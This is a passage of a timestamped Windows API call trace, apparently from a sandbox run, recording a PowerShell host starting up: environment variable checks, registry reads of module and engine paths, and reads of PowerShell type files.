[0077.451] CoTaskMemFree (pv=0x256670)
[0077.452] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.452] CoTaskMemFree (pv=0x256670)
[0077.465] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.465] CoTaskMemFree (pv=0x256670)
[0077.466] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.466] CoTaskMemFree (pv=0x256670)
[0077.468] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.468] CoTaskMemFree (pv=0x256670)
[0077.470] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.470] CoTaskMemFree (pv=0x256670)
[0077.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0077.602] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.602] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
[0077.602] CoTaskMemFree (pv=0x256670)
[0077.603] CoTaskMemAlloc (cb=0xcc) returned 0x315800
[0077.603] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x315800, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.603] CoTaskMemFree (pv=0x315800)
[0077.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d668 | out: phkResult=0x16d668*=0x328) returned 0x0
[0077.603] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d5ec, lpData=0x0, lpcbData=0x16d5e8*=0x0 | out: lpType=0x16d5ec*=0x2, lpData=0x0, lpcbData=0x16d5e8*=0x6c) returned 0x0
[0077.603] CoTaskMemAlloc (cb=0x70) returned 0x28e010
[0077.603] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d5bc, lpData=0x28e010, lpcbData=0x16d5b8*=0x6c | out: lpType=0x16d5bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d5b8*=0x6c) returned 0x0
[0077.603] CoTaskMemFree (pv=0x28e010)
[0077.603] CoTaskMemAlloc (cb=0xcc) returned 0x315800
[0077.603] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x315800, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
[0077.604] CoTaskMemFree (pv=0x315800)
[0077.604] CoTaskMemAlloc (cb=0xcc) returned 0x315800
[0077.604] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x315800, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.604] CoTaskMemFree (pv=0x315800)
[0077.606] RegCloseKey (hKey=0x328) returned 0x0
[0077.606] CoTaskMemAlloc (cb=0xcc) returned 0x315800
[0077.606] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x315800, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
[0077.606] CoTaskMemFree (pv=0x315800)
[0077.606] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d668 | out: phkResult=0x16d668*=0x328) returned 0x0
[0077.606] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d5ec, lpData=0x0, lpcbData=0x16d5e8*=0x0 | out: lpType=0x16d5ec*=0x0, lpData=0x0, lpcbData=0x16d5e8*=0x0) returned 0x2
[0077.606] RegCloseKey (hKey=0x328) returned 0x0
[0077.668] CoTaskMemAlloc (cb=0x20c) returned 0x31a9c0
[0077.668] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x31a9c0 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
[0077.669] CoTaskMemFree (pv=0x31a9c0)
[0077.669] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x16d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
[0077.670] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
[0077.686] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.686] CoTaskMemFree (pv=0x256670)
[0077.687] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.687] CoTaskMemFree (pv=0x256670)
[0077.711] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.711] CoTaskMemFree (pv=0x256670)
[0077.712] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.712] CoTaskMemFree (pv=0x256670)
[0077.714] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d458 | out: phkResult=0x16d458*=0x330) returned 0x0
[0077.717] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x74) returned 0x0
[0077.717] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x16d3dc, lpData=0x0, lpcbData=0x16d3d8*=0x0 | out: lpType=0x16d3dc*=0x1, lpData=0x0, lpcbData=0x16d3d8*=0x74) returned 0x0
[0077.717] CoTaskMemAlloc (cb=0x78) returned 0x28e010
[0077.717] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x16d3ac, lpData=0x28e010, lpcbData=0x16d3a8*=0x74 | out: lpType=0x16d3ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d3a8*=0x74) returned 0x0
[0077.717] CoTaskMemFree (pv=0x28e010)
[0077.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
[0077.718] SetErrorMode (uMode=0x1) returned 0x1
[0077.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d330 | out: lpFileInformation=0x16d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0077.718] SetErrorMode (uMode=0x1) returned 0x1
[0077.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.718] SetErrorMode (uMode=0x1) returned 0x1
[0077.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d330 | out: lpFileInformation=0x16d330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
[0077.724] SetErrorMode (uMode=0x1) returned 0x1
[0077.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.735] SetErrorMode (uMode=0x1) returned 0x1
[0077.735] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d330 | out: lpFileInformation=0x16d330*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
[0077.735] SetErrorMode (uMode=0x1) returned 0x1
[0077.735] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.735] CoTaskMemFree (pv=0x256670)
[0077.736] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.736] CoTaskMemFree (pv=0x256670)
[0077.736] GetACP () returned 0x4e4
[0077.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.739] SetErrorMode (uMode=0x1) returned 0x1
[0077.740] SetErrorMode (uMode=0x1) returned 0x1
[0077.740] GetFileType (hFile=0x334) returned 0x1
[0077.751] ReadFile (in: hFile=0x334, lpBuffer=0x2ea5838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2ea5838*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.752] ReadFile (in: hFile=0x334, lpBuffer=0x2ea5838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2ea5838*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.752] ReadFile (in: hFile=0x334, lpBuffer=0x2ea5838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2ea5838*, lpNumberOfBytesRead=0x16d268*=0xcf3, lpOverlapped=0x0) returned 1
[0077.752] ReadFile (in: hFile=0x334, lpBuffer=0x2ea4c93, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2ea4c93*, lpNumberOfBytesRead=0x16d268*=0x0, lpOverlapped=0x0) returned 1
[0077.752] ReadFile (in: hFile=0x334, lpBuffer=0x2ea5838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2ea5838*, lpNumberOfBytesRead=0x16d268*=0x0, lpOverlapped=0x0) returned 1
[0077.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.754] SetErrorMode (uMode=0x1) returned 0x1
[0077.754] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1e0 | out: lpFileInformation=0x16d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
[0077.755] SetErrorMode (uMode=0x1) returned 0x1
[0077.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.756] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d2c8 | out: phkResult=0x16d2c8*=0x334) returned 0x0
[0077.756] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d24c, lpData=0x0, lpcbData=0x16d248*=0x0 | out: lpType=0x16d24c*=0x1, lpData=0x0, lpcbData=0x16d248*=0x56) returned 0x0
[0077.756] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f5720
[0077.756] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d21c, lpData=0x1b7f5720, lpcbData=0x16d218*=0x56 | out: lpType=0x16d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d218*=0x56) returned 0x0
[0077.756] CoTaskMemFree (pv=0x1b7f5720)
[0077.756] RegCloseKey (hKey=0x334) returned 0x0
[0077.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
[0077.826] GetSystemInfo (in: lpSystemInfo=0x16bf00 | out: lpSystemInfo=0x16bf00*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0077.826] VirtualQuery (in: lpAddress=0x16bfb0, lpBuffer=0x16ce70, dwLength=0x30 | out: lpBuffer=0x16ce70*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0077.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
[0077.859] SetErrorMode (uMode=0x1) returned 0x1
[0077.859] SetErrorMode (uMode=0x1) returned 0x1
[0077.859] GetFileType (hFile=0x334) returned 0x1
[0077.859] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.871] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.872] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.872] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.872] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.873] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.873] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.873] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.873] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.874] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.874] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.874] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.874] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
[0077.875] ReadFile (in: hFile=0x334, lpBuffer=0x2f0c9f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d268, lpOverlapped=0x0 | out: lpBuffer=0x2f0c9f8*, lpNumberOfBytesRead=0x16d268*=0x1000, lpOverlapped=0x0) returned 1
